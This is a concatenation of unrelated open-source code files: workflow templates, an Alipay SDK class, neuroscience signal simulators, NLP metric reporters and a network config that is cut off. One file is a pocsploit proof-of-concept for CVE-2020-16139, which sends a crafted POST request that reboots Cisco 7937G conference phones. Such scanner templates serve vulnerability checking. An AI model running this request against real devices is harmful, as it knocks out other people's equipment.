for occurrence in EntityOccurrence.objects.filter(entity=entity,
document=document):
occurrence.entity = canonical
occurrence.save()
|
couler/core/templates/template.py
|
dmerrick/couler
| 700 |
69379
|
<filename>couler/core/templates/template.py
# Copyright 2021 The Couler Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict
from couler.core import utils
class Template(object):
def __init__(
self,
name,
output=None,
input=None,
timeout=None,
retry=None,
pool=None,
enable_ulogfs=True,
daemon=False,
cache=None,
parallelism=None,
):
self.name = name
self.output = output
self.input = input
self.timeout = timeout
self.retry = retry
self.pool = pool
self.enable_ulogfs = enable_ulogfs
self.daemon = daemon
self.cache = cache
self.parallelism: int = parallelism
def to_dict(self):
template = OrderedDict({"name": self.name})
if self.daemon:
template["daemon"] = True
if self.timeout is not None:
template["activeDeadlineSeconds"] = self.timeout
if self.retry is not None:
template["retryStrategy"] = utils.config_retry_strategy(self.retry)
if self.cache is not None:
template["memoize"] = self.cache.to_dict()
if self.parallelism is not None:
template["parallelism"] = self.parallelism
return template
|
alipay/aop/api/response/AlipayPcreditLoanCollateralCarQueryResponse.py
|
snowxmas/alipay-sdk-python-all
| 213 |
69380
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayPcreditLoanCollateralCarQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayPcreditLoanCollateralCarQueryResponse, self).__init__()
self._address = None
self._apply_no = None
self._car_brand_id = None
self._car_color = None
self._car_engine_no = None
self._car_mileage = None
self._car_model_id = None
self._car_reg_date = None
self._car_series_id = None
self._car_vin = None
self._cert_no = None
self._cert_type = None
self._created_time = None
self._lic_plate_address = None
self._lic_plate_no = None
self._name = None
@property
def address(self):
return self._address
@address.setter
def address(self, value):
self._address = value
@property
def apply_no(self):
return self._apply_no
@apply_no.setter
def apply_no(self, value):
self._apply_no = value
@property
def car_brand_id(self):
return self._car_brand_id
@car_brand_id.setter
def car_brand_id(self, value):
self._car_brand_id = value
@property
def car_color(self):
return self._car_color
@car_color.setter
def car_color(self, value):
self._car_color = value
@property
def car_engine_no(self):
return self._car_engine_no
@car_engine_no.setter
def car_engine_no(self, value):
self._car_engine_no = value
@property
def car_mileage(self):
return self._car_mileage
@car_mileage.setter
def car_mileage(self, value):
self._car_mileage = value
@property
def car_model_id(self):
return self._car_model_id
@car_model_id.setter
def car_model_id(self, value):
self._car_model_id = value
@property
def car_reg_date(self):
return self._car_reg_date
@car_reg_date.setter
def car_reg_date(self, value):
self._car_reg_date = value
@property
def car_series_id(self):
return self._car_series_id
@car_series_id.setter
def car_series_id(self, value):
self._car_series_id = value
@property
def car_vin(self):
return self._car_vin
@car_vin.setter
def car_vin(self, value):
self._car_vin = value
@property
def cert_no(self):
return self._cert_no
@cert_no.setter
def cert_no(self, value):
self._cert_no = value
@property
def cert_type(self):
return self._cert_type
@cert_type.setter
def cert_type(self, value):
self._cert_type = value
@property
def created_time(self):
return self._created_time
@created_time.setter
def created_time(self, value):
self._created_time = value
@property
def lic_plate_address(self):
return self._lic_plate_address
@lic_plate_address.setter
def lic_plate_address(self, value):
self._lic_plate_address = value
@property
def lic_plate_no(self):
return self._lic_plate_no
@lic_plate_no.setter
def lic_plate_no(self, value):
self._lic_plate_no = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
def parse_response_content(self, response_content):
response = super(AlipayPcreditLoanCollateralCarQueryResponse, self).parse_response_content(response_content)
if 'address' in response:
self.address = response['address']
if 'apply_no' in response:
self.apply_no = response['apply_no']
if 'car_brand_id' in response:
self.car_brand_id = response['car_brand_id']
if 'car_color' in response:
self.car_color = response['car_color']
if 'car_engine_no' in response:
self.car_engine_no = response['car_engine_no']
if 'car_mileage' in response:
self.car_mileage = response['car_mileage']
if 'car_model_id' in response:
self.car_model_id = response['car_model_id']
if 'car_reg_date' in response:
self.car_reg_date = response['car_reg_date']
if 'car_series_id' in response:
self.car_series_id = response['car_series_id']
if 'car_vin' in response:
self.car_vin = response['car_vin']
if 'cert_no' in response:
self.cert_no = response['cert_no']
if 'cert_type' in response:
self.cert_type = response['cert_type']
if 'created_time' in response:
self.created_time = response['created_time']
if 'lic_plate_address' in response:
self.lic_plate_address = response['lic_plate_address']
if 'lic_plate_no' in response:
self.lic_plate_no = response['lic_plate_no']
if 'name' in response:
self.name = response['name']
|
testcases/elichika_tests/node/Unpooling2D.py
|
vermashresth/chainer-compiler
| 116 |
69393
|
<filename>testcases/elichika_tests/node/Unpooling2D.py
# coding: utf-8
import chainer
import chainer.functions as F
class Unpooling2D(chainer.Chain):
def forward(self, x):
y = F.unpooling_2d(x, 2, cover_all=False)
return y
class Unpooling2D_3x4(chainer.Chain):
def forward(self, x):
y = F.unpooling_2d(x, (3, 4), cover_all=False)
return y
# ======================================
import numpy as np
from chainer_compiler.elichika import testtools
def main():
x = np.random.rand(2, 3, 11, 7).astype(np.float32)
testtools.generate_testcase(Unpooling2D, [x])
testtools.generate_testcase(Unpooling2D_3x4, [x], subname='3x4')
# The largest input in FPN.
x = np.random.rand(1, 256, 100, 100).astype(np.float32)
testtools.generate_testcase(Unpooling2D, [x], subname='large')
if __name__ == '__main__':
main()
|
seamseg/config/__init__.py
|
gladcolor/seamseg
| 282 |
69414
|
<filename>seamseg/config/__init__.py<gh_stars>100-1000
from .config import load_config, DEFAULTS
|
2020/CVE-2020-16139/poc/pocsploit/CVE-2020-16139.py
|
hjyuan/reapoc
| 421 |
69445
|
<filename>2020/CVE-2020-16139/poc/pocsploit/CVE-2020-16139.py
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Cisco 7937G Denial-of-Service Reboot Attack''',
"description": '''A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.''',
"severity": "high",
"references": [
"https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"cvss-score": "",
"cve-id": "CVE-2020-16139",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2020", "dos", "cisco"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"""
method = "POST"
data = """"""
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/xml""" in str(resp0.headers)) and ("""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""" in resp0.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
chrome/installer/mini_installer/generate_previous_version_mini_installer.py
|
zipated/src
| 2,151 |
69517
|
<reponame>zipated/src
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates a mini_installer with a lower version than an existing one."""
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--out', help='Path to the generated mini_installer.')
args = parser.parse_args()
assert args.out
return subprocess.call([
'alternate_version_generator.exe',
'--force',
'--previous',
'--out=' + args.out,
])
if '__main__' == __name__:
sys.exit(main())
|
neurodsp/sim/aperiodic.py
|
JanCBrammer/neurodsp
| 154 |
69532
|
"""Simulating time series, with aperiodic activity."""
import numpy as np
from scipy.stats import zscore
from scipy.linalg import toeplitz, cholesky
from neurodsp.filt import filter_signal, infer_passtype
from neurodsp.filt.fir import compute_filter_length
from neurodsp.filt.checks import check_filter_definition
from neurodsp.utils import remove_nans
from neurodsp.utils.checks import check_param_range
from neurodsp.utils.data import create_times, compute_nsamples
from neurodsp.utils.decorators import normalize
from neurodsp.spectral import rotate_powerlaw
from neurodsp.sim.transients import sim_synaptic_kernel
###################################################################################################
###################################################################################################
@normalize
def sim_poisson_pop(n_seconds, fs, n_neurons=1000, firing_rate=2):
"""Simulate a Poisson population.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
n_neurons : int, optional, default: 1000
Number of neurons in the simulated population.
firing_rate : float, optional, default: 2
Firing rate of individual neurons in the population.
Returns
-------
sig : 1d array
Simulated population activity.
Notes
-----
The simulated signal is essentially white noise, but satisfies the Poisson
property, i.e. mean(X) = var(X).
The lambda parameter of the Poisson process (total rate) is determined as
firing rate * number of neurons, i.e. summation of Poisson processes is still
a Poisson processes.
Note that the Gaussian approximation for a sum of Poisson processes is only
a good approximation for large lambdas.
Examples
--------
Simulate a Poisson population:
>>> sig = sim_poisson_pop(n_seconds=1, fs=500, n_neurons=1000, firing_rate=2)
"""
# Poisson population rate signal scales with # of neurons and individual rate
lam = n_neurons * firing_rate
# Variance is equal to the mean
sig = np.random.normal(loc=lam, scale=lam**0.5, size=compute_nsamples(n_seconds, fs))
# Enforce that sig is non-negative in cases of low firing rate
sig[np.where(sig < 0.)] = 0.
return sig
@normalize
def sim_synaptic_current(n_seconds, fs, n_neurons=1000, firing_rate=2.,
tau_r=0., tau_d=0.01, t_ker=None):
"""Simulate a signal as a synaptic current, which has 1/f characteristics with a knee.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
n_neurons : int, optional, default: 1000
Number of neurons in the simulated population.
firing_rate : float, optional, default: 2
Firing rate of individual neurons in the population.
tau_r : float, optional, default: 0.
Rise time of synaptic kernel, in seconds.
tau_d : float, optional, default: 0.01
Decay time of synaptic kernel, in seconds.
t_ker : float, optional
Length of time of the simulated synaptic kernel, in seconds.
Returns
-------
sig : 1d array
Simulated synaptic current.
Notes
-----
- This simulation is based on the one used in [1]_.
- The resulting signal is most similar to unsigned intracellular current or conductance change.
References
----------
.. [1] <NAME>., <NAME>., & <NAME>. (2017). Inferring synaptic
excitation/inhibition balance from field potentials. NeuroImage, 158, 70–78.
DOI: https://doi.org/10.1016/j.neuroimage.2017.06.078
Examples
--------
Simulate a synaptic current signal:
>>> sig = sim_synaptic_current(n_seconds=1, fs=500)
"""
# If not provided, compute t_ker as a function of decay time constant
if t_ker is None:
t_ker = 5. * tau_d
# Simulate an extra bit because the convolution will trim & turn off normalization
sig = sim_poisson_pop((n_seconds + t_ker), fs, n_neurons, firing_rate,
mean=None, variance=None)
ker = sim_synaptic_kernel(t_ker, fs, tau_r, tau_d)
sig = np.convolve(sig, ker, 'valid')[:compute_nsamples(n_seconds, fs)]
return sig
@normalize
def sim_knee(n_seconds, fs, chi1, chi2, knee):
"""Simulate a signal whose power spectrum has a 1/f structure with a knee.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
chi1 : float
Power law exponent before the knee.
chi2 : float
Power law exponent added to chi1 after the knee.
knee : float
Location of the knee in Hz.
Returns
-------
sig : 1d array
Time series with the desired power spectrum.
Notes
-----
This simulated time series has a power spectrum that follows the Lorentzian equation:
`P(f) = 1 / (f**chi1 * (f**chi2 + knee))`
- This simulation creates this power spectrum shape using a sum of sinusoids.
- The slope of the log power spectrum before the knee is chi1 whereas after the knee it is chi2,
but only when the sign of chi1 and chi2 are the same.
Examples
--------
Simulate a time series with chi1 of -1, chi2 of -2, and knee of 100:
>> sim_knee(n_seconds=10, fs=1000, chi1=-1, chi2=-2, knee=100)
"""
times = create_times(n_seconds, fs)
n_samples = compute_nsamples(n_seconds, fs)
# Create frequencies for the power spectrum, which will be freqs of the summed cosines
freqs = np.linspace(0, fs/2, num=int(n_samples//2 + 1), endpoint=True)
# Drop the DC component
freqs = freqs[1:]
# Map the frequencies under the (square root) Lorentzian
# This will give us the amplitude coefficients for the sinusoids
cosine_coeffs = np.array([np.sqrt(1 / (freq ** -chi1 * (freq ** (-chi2 - chi1) + knee))) \
for freq in freqs])
# Add sinusoids with a random phase shift
sig = np.sum(np.array([cosine_coeffs[ell] * \
np.cos(2 * np.pi * freq * times + 2 * np.pi * np.random.rand()) \
for ell, freq in enumerate(freqs)]), axis=0)
return sig
@normalize
def sim_random_walk(n_seconds, fs, theta=1., mu=0., sigma=5.):
"""Simulate a mean-reverting random walk, as an Ornstein-Uhlenbeck process.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
theta : float, optional, default: 1.0
Memory scale parameter. Larger theta values create faster fluctuations.
mu : float, optional, default: 0.0
Mean of the random walk.
sigma : float, optional, default: 5.0
Standard deviation of the random walk.
Returns
-------
sig : 1d array
Simulated random walk signal.
Notes
-----
The random walk is simulated as a discretized Ornstein-Uhlenbeck process:
`dx = theta*(x-mu)*dt + sigma*dWt`
Where:
- mu : mean
- sigma : standard deviation
- theta : memory scale
- dWt : increments of Wiener process, i.e. white noise
See the wikipedia page [1]_ for the integral solution.
References
----------
.. [1] https://en.wikipedia.org/wiki/Ornstein-Uhlenbeck_process#Formal_solution
Examples
--------
Simulate a Ornstein-Uhlenbeck random walk:
>>> sig = sim_random_walk(n_seconds=1, fs=500, theta=1.)
"""
times = create_times(n_seconds, fs)
x0 = mu
dt = times[1] - times[0]
ws = np.random.normal(size=len(times))
ex = np.exp(-theta * times)
ws[0] = 0.
sig = x0 * ex + mu * (1. - ex) + sigma * ex * \
np.cumsum(np.exp(theta * times) * np.sqrt(dt) * ws)
return sig
@normalize
def sim_powerlaw(n_seconds, fs, exponent=-2.0, f_range=None, **filter_kwargs):
"""Simulate a power law time series, with a specified exponent.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
exponent : float, optional, default: -2
Desired power-law exponent, of the form P(f)=f^exponent.
f_range : list of [float, float] or None, optional
Frequency range to filter simulated data, as [f_lo, f_hi], in Hz.
**filter_kwargs : kwargs, optional
Keyword arguments to pass to `filter_signal`.
Returns
-------
sig : 1d array
Time-series with the desired power law exponent.
Notes
-----
- Powerlaw data with exponents is created by spectrally rotating white noise [1]_.
References
----------
.. [1] <NAME>., & <NAME>. (1995). On Generating Power Law Noise.
Astronomy and Astrophysics, 300, 707–710.
Examples
--------
Simulate a power law signal, with an exponent of -2 (brown noise):
>>> sig = sim_powerlaw(n_seconds=1, fs=500, exponent=-2.0)
Simulate a power law signal, with a highpass filter applied at 2 Hz:
>>> sig = sim_powerlaw(n_seconds=1, fs=500, exponent=-1.5, f_range=(2, None))
"""
# Compute the number of samples for the simulated time series
n_samples = compute_nsamples(n_seconds, fs)
# Get the number of samples to simulate for the signal
# If signal is to be filtered, with FIR, add extra to compensate for edges
if f_range and filter_kwargs.get('filter_type', None) != 'iir':
pass_type = infer_passtype(f_range)
filt_len = compute_filter_length(fs, pass_type,
*check_filter_definition(pass_type, f_range),
n_seconds=filter_kwargs.get('n_seconds', None),
n_cycles=filter_kwargs.get('n_cycles', 3))
n_samples += filt_len + 1
# Simulate the powerlaw data
sig = _create_powerlaw(n_samples, fs, exponent)
if f_range is not None:
sig = filter_signal(sig, fs, infer_passtype(f_range), f_range,
remove_edges=True, **filter_kwargs)
# Drop the edges, that were compensated for, if not using FIR filter
if not filter_kwargs.get('filter_type', None) == 'iir':
sig, _ = remove_nans(sig)
return sig
@normalize
def sim_frac_gaussian_noise(n_seconds, fs, chi=0, hurst=None):
"""Simulate a timeseries as fractional gaussian noise.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
chi: float, optional, default: 0
Desired power law exponent of the spectrum of the signal.
Must be in the range (-1, 1).
hurst : float, optional, default: None
Desired Hurst parameter, which must be in the range (0, 1).
If provided, this value overwrites the `chi` parameter.
Returns
-------
sig: 1d array
Simulated fractional gaussian noise time series.
Notes
-----
The time series can be specified with either a desired power law exponent,
or alternatively with a specified Hurst parameter.
The Hurst parameter is not the Hurst exponent as defined in rescaled range analysis.
The Hurst parameter is defined for self-similar processes such that Y(at) = a^H Y(t)
for all a > 0, where this equality holds in distribution.
The relationship between the power law exponent chi and the Hurst parameter
for fractional gaussian noise is chi = 2 * hurst - 1.
For more information, consult [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., & <NAME>. (2002). Fractal characterization of
complexity in temporal physiological signals. Physiological Measurement, 23(1), R1–R38.
DOI: https://doi.org/10.1088/0967-3334/23/1/201
Examples
--------
Simulate fractional gaussian noise with a power law decay of 0 (white noise):
>>> sig = sim_frac_gaussian_noise(n_seconds=1, fs=500, chi=0)
Simulate fractional gaussian noise with a Hurst parameter of 0.5 (also white noise):
>>> sig = sim_frac_gaussian_noise(n_seconds=1, fs=500, hurst=0.5)
"""
if hurst is not None:
check_param_range(hurst, 'hurst', (0, 1))
else:
check_param_range(chi, 'chi', (-1, 1))
# Infer the hurst parameter from chi
hurst = (-chi + 1.) / 2
# Compute the number of samples for the simulated time series
n_samples = compute_nsamples(n_seconds, fs)
# Define helper function for computing the auto-covariance
def autocov(hurst):
return lambda k: 0.5 * (np.abs(k - 1) ** (2 * hurst) - 2 * \
k ** (2 * hurst) + (k + 1) ** (2 * hurst))
# Build the autocovariance matrix
gamma = np.arange(0, n_samples)
gamma = np.apply_along_axis(autocov(hurst), 0, gamma)
autocov_matrix = toeplitz(gamma)
# Use the Cholesky factor to transform white noise to get the desired time series
white_noise = np.random.randn(n_samples)
cholesky_factor = cholesky(autocov_matrix, lower=True)
sig = cholesky_factor @ white_noise
return sig
@normalize
def sim_frac_brownian_motion(n_seconds, fs, chi=-2, hurst=None):
"""Simulate a timeseries as fractional brownian motion.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
chi : float, optional, default: -2
Desired power law exponent of the spectrum of the signal.
Must be in the range (-3, -1).
hurst : float, optional, default: None
Desired Hurst parameter, which must be in the range (0, 1).
If provided, this value overwrites the `chi` parameter.
Returns
-------
sig : 1d array
Simulated fractional brownian motion time series.
Notes
-----
The time series can be specified with either a desired power law exponent,
or alternatively with a specified Hurst parameter.
Note that when specifying there can be some bias leading to a steeper than expected
spectrum of the simulated signal. This bias is higher for chi values near to 1,
and may be more severe in shorter signals.
The Hurst parameter is not the Hurst exponent in general. The Hurst parameter
is defined for self-similar processes such that Y(at) = a^H Y(t) for all a > 0,
where this equality holds in distribution.
The relationship between the power law exponent chi and the Hurst parameter
for fractional brownian motion is chi = 2 * hurst + 1
For more information, consult [1]_ and/or [2]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., & <NAME>. (2002). Fractal characterization of
complexity in temporal physiological signals. Physiological Measurement, 23(1), R1–R38.
DOI: https://doi.org/10.1088/0967-3334/23/1/201
.. [2] <NAME>. (2004). Simulation of fractional Brownian motion. 77.
Examples
--------
Simulate fractional brownian motion with a power law exponent of -2 (brown noise):
>>> sig = sim_frac_brownian_motion(n_seconds=1, fs=500, chi=-2)
Simulate fractional brownian motion with a Hurst parameter of 0.5 (also brown noise):
>>> sig = sim_frac_brownian_motion(n_seconds=1, fs=500, hurst=0.5)
"""
if hurst is not None:
check_param_range(hurst, 'hurst', (0, 1))
else:
check_param_range(chi, 'chi', (-3, -1))
# Infer the hurst parameter from chi
hurst = (-chi - 1.) / 2
# Fractional brownian motion is the cumulative sum of fractional gaussian noise
fgn = sim_frac_gaussian_noise(n_seconds, fs, hurst=hurst)
sig = np.cumsum(fgn)
return sig
def _create_powerlaw(n_samples, fs, exponent):
"""Create a power law time series.
Parameters
----------
n_samples : int
The number of samples to simulate.
fs : float
Sampling rate of simulated signal, in Hz.
exponent : float
Desired power-law exponent, of the form P(f)=f^exponent.
Returns
-------
sig : 1d array
Time-series with the desired power law exponent.
Notes
-----
This function creates variable power law exponents by spectrally rotating white noise.
"""
# Start with white noise signal, that we will rotate, in frequency space
sig = np.random.randn(n_samples)
# Compute the FFT
fft_output = np.fft.fft(sig)
freqs = np.fft.fftfreq(len(sig), 1. / fs)
# Rotate spectrum and invert back to time series, with a z-score to normalize
# Delta exponent is divided by two, as the FFT output is in units of amplitude not power
fft_output_rot = rotate_powerlaw(freqs, fft_output, -exponent/2)
sig = zscore(np.real(np.fft.ifft(fft_output_rot)))
return sig
|
pytext/metric_reporters/word_tagging_metric_reporter.py
|
baronrustamov/pytext
| 6,199 |
69534
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import itertools
import re
from collections import Counter
from typing import Dict, List, NamedTuple
from pytext.common.constants import DatasetFieldName, SpecialTokens, Stage
from pytext.data import CommonMetadata
from pytext.metrics import (
AllConfusions,
Confusions,
LabelPrediction,
PRF1Metrics,
compute_classification_metrics,
compute_multi_label_multi_class_soft_metrics,
)
from pytext.metrics.intent_slot_metrics import (
Node,
NodesPredictionPair,
Span,
compute_prf1_metrics,
)
from pytext.utils.data import merge_token_labels_to_slot, parse_slot_string
from .channel import Channel, ConsoleChannel, FileChannel
from .metric_reporter import MetricReporter
NAN_LABELS = [SpecialTokens.UNK, SpecialTokens.PAD]
def get_slots(word_names):
slots = {
Node(label=slot.label, span=Span(slot.start, slot.end))
for slot in parse_slot_string(word_names)
}
return Counter(slots)
class WordTaggingMetricReporter(MetricReporter):
def __init__(
self, label_names: List[str], use_bio_labels: bool, channels: List[Channel]
) -> None:
super().__init__(channels)
self.label_names = label_names
self.use_bio_labels = use_bio_labels
@classmethod
def from_config(cls, config, meta: CommonMetadata):
return cls(
meta.target.vocab.itos,
meta.target.use_bio_labels,
[ConsoleChannel(), FileChannel((Stage.TEST,), config.output_path)],
)
def calculate_loss(self):
total_loss = n_words = pos = 0
for loss, batch_size in zip(self.all_loss, self.batch_size):
num_words_in_batch = sum(
self.all_context["seq_lens"][pos : pos + batch_size]
)
pos = pos + batch_size
total_loss += loss * num_words_in_batch
n_words += num_words_in_batch
return total_loss / float(n_words)
def process_pred(self, pred: List[int]) -> List[str]:
"""pred is a list of token label index"""
return [self.label_names[p] for p in pred]
def calculate_metric(self):
return compute_prf1_metrics(
[
NodesPredictionPair(
get_slots(
merge_token_labels_to_slot(
token_range,
self.process_pred(pred[0:seq_len]),
self.use_bio_labels,
)
),
get_slots(slots_label),
)
for pred, seq_len, token_range, slots_label in zip(
self.all_preds,
self.all_context[DatasetFieldName.SEQ_LENS],
self.all_context[DatasetFieldName.TOKEN_RANGE],
self.all_context[DatasetFieldName.RAW_WORD_LABEL],
)
]
)[1]
def get_model_select_metric(self, metrics):
return metrics.micro_scores.f1
class MultiLabelSequenceTaggingMetricReporter(MetricReporter):
def __init__(self, label_names, pad_idx, channels, label_vocabs=None):
self.label_names = label_names
self.pad_idx = pad_idx
self.label_vocabs = label_vocabs
super().__init__(channels)
@classmethod
def from_config(cls, config, tensorizers):
return MultiLabelSequenceTaggingMetricReporter(
channels=[ConsoleChannel(), FileChannel((Stage.TEST,), config.output_path)],
label_names=tensorizers.keys(),
pad_idx=[v.pad_idx for _, v in tensorizers.items()],
label_vocabs=[v.vocab._vocab for _, v in tensorizers.items()],
)
def aggregate_tuple_data(self, all_data, new_batch):
assert isinstance(new_batch, tuple)
# num_label_set * bsz * ...
data = [self._make_simple_list(d) for d in new_batch]
# convert to bsz * num_label_set * ...
for d in zip(*data):
all_data.append(d)
def aggregate_preds(self, batch_preds, batch_context=None):
self.aggregate_tuple_data(self.all_preds, batch_preds)
def aggregate_targets(self, batch_targets, batch_context=None):
self.aggregate_tuple_data(self.all_targets, batch_targets)
def aggregate_scores(self, batch_scores):
self.aggregate_tuple_data(self.all_scores, batch_scores)
def calculate_metric(self):
list_score_pred_expect = []
for label_idx, _ in enumerate(self.label_names):
list_score_pred_expect.append(
list(
itertools.chain.from_iterable(
(
LabelPrediction(s, p, e)
for s, p, e in zip(
scores[label_idx], pred[label_idx], expect[label_idx]
)
if e != self.pad_idx[label_idx]
)
for scores, pred, expect in zip(
self.all_scores, self.all_preds, self.all_targets
)
)
)
)
metrics = compute_multi_label_multi_class_soft_metrics(
list_score_pred_expect, self.label_names, self.label_vocabs
)
return metrics
def batch_context(self, raw_batch, batch):
return {}
@staticmethod
def get_model_select_metric(metrics):
return metrics.average_overall_precision
class SequenceTaggingMetricReporter(MetricReporter):
def __init__(self, label_names, pad_idx, channels):
super().__init__(channels)
self.label_names = label_names
self.pad_idx = pad_idx
@classmethod
def from_config(cls, config, tensorizer):
return SequenceTaggingMetricReporter(
channels=[ConsoleChannel(), FileChannel((Stage.TEST,), config.output_path)],
label_names=list(tensorizer.vocab),
pad_idx=tensorizer.pad_idx,
)
def calculate_metric(self):
return compute_classification_metrics(
list(
itertools.chain.from_iterable(
(
LabelPrediction(s, p, e)
for s, p, e in zip(scores, pred, expect)
if e != self.pad_idx
)
for scores, pred, expect in zip(
self.all_scores, self.all_preds, self.all_targets
)
)
),
self.label_names,
self.calculate_loss(),
)
def batch_context(self, raw_batch, batch):
return {}
@staticmethod
def get_model_select_metric(metrics):
return metrics.accuracy
class Span(NamedTuple):
label: str
start: int
end: int
def convert_bio_to_spans(bio_sequence: List[str]) -> List[Span]:
"""
Process the output and convert to spans for evaluation.
"""
spans = [] # (label, startindex, endindex)
cur_start = None
cur_label = None
N = len(bio_sequence)
for t in range(N + 1):
if (cur_start is not None) and (t == N or re.search("^[BO]", bio_sequence[t])):
assert cur_label is not None
spans.append(Span(cur_label, cur_start, t))
cur_start = None
cur_label = None
if t == N:
continue
assert bio_sequence[t]
if bio_sequence[t][0] not in ("B", "I", "O"):
bio_sequence[t] = "O"
if bio_sequence[t].startswith("B"):
cur_start = t
cur_label = re.sub("^B-?", "", bio_sequence[t]).strip()
if bio_sequence[t].startswith("I"):
if cur_start is None:
newseq = bio_sequence[:]
newseq[t] = "B" + newseq[t][1:]
return convert_bio_to_spans(newseq)
continuation_label = re.sub("^I-?", "", bio_sequence[t])
if continuation_label != cur_label:
newseq = bio_sequence[:]
newseq[t] = "B" + newseq[t][1:]
return convert_bio_to_spans(newseq)
# should have exited for last span ending at end by now
assert cur_start is None
return spans
class NERMetricReporter(MetricReporter):
def __init__(
self,
label_names: List[str],
pad_idx: int,
channels: List[Channel],
use_bio_labels: bool = True,
) -> None:
super().__init__(channels)
self.label_names = label_names
self.use_bio_labels = use_bio_labels
self.pad_idx = pad_idx
assert self.use_bio_labels
@classmethod
def from_config(cls, config, tensorizer):
return WordTaggingMetricReporter(
channels=[ConsoleChannel()],
label_names=list(tensorizer.vocab),
pad_idx=tensorizer.pad_idx,
)
def calculate_metric(self) -> PRF1Metrics:
all_confusions = AllConfusions()
for pred, expect in zip(self.all_preds, self.all_targets):
pred_seq, expect_seq = [], []
for p, e in zip(pred, expect):
if e != self.pad_idx:
pred_seq.append(self.label_names[p])
expect_seq.append(self.label_names[e])
expect_spans = convert_bio_to_spans(expect_seq)
pred_spans = convert_bio_to_spans(pred_seq)
expect_spans_set = set(expect_spans)
pred_spans_set = set(pred_spans)
true_positive = expect_spans_set & pred_spans_set
false_positive = pred_spans_set - expect_spans_set
false_negative = expect_spans_set - pred_spans_set
all_confusions.confusions += Confusions(
TP=len(true_positive), FP=len(false_positive), FN=len(false_negative)
)
for span in true_positive:
all_confusions.per_label_confusions.update(span.label, "TP", 1)
for span in false_positive:
all_confusions.per_label_confusions.update(span.label, "FP", 1)
for span in false_negative:
all_confusions.per_label_confusions.update(span.label, "FN", 1)
return all_confusions.compute_metrics()
def batch_context(self, raw_batch, batch):
return {}
@staticmethod
def get_model_select_metric(metrics):
return metrics.micro_scores.f1
|
network.py
|
sjoerdvansteenkiste/Neural-EM
| 116 |
69559
|
<gh_stars>100-1000
#!/usr/bin/env python
# coding=utf-8
from __future__ import division, print_function, unicode_literals
import tensorflow as tf
import tensorflow.contrib.slim as slim
from sacred import Ingredient
from tensorflow.contrib.rnn import RNNCell
from utils import ACTIVATION_FUNCTIONS
net = Ingredient('network')
@net.config
def cfg():
use_NEM_formulation = False
input = []
recurrent = [
{'name': 'rnn', 'size': 250, 'act': 'sigmoid', 'ln': False}
]
output = [
{'name': 'fc', 'size': 784, 'act': '*', 'ln': False},
]
net.add_named_config('flying_mnist', {
'input': [
{'name': 'input_norm'},
{'name': 'reshape', 'shape': (24, 24, 1)},
{'name': 'conv', 'size': 32, 'act': 'elu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'conv', 'size': 64, 'act': 'elu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'conv', 'size': 128, 'act': 'elu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'reshape', 'shape': -1},
{'name': 'fc', 'size': 512, 'act': 'elu', 'ln': True}
],
'recurrent': [
{'name': 'rnn', 'size': 250, 'act': 'sigmoid', 'ln': True}
],
'output': [
{'name': 'fc', 'size': 512, 'act': 'relu', 'ln': True},
{'name': 'fc', 'size': 3 * 3 * 128, 'act': 'relu', 'ln': True},
{'name': 'reshape', 'shape': (3, 3, 128)},
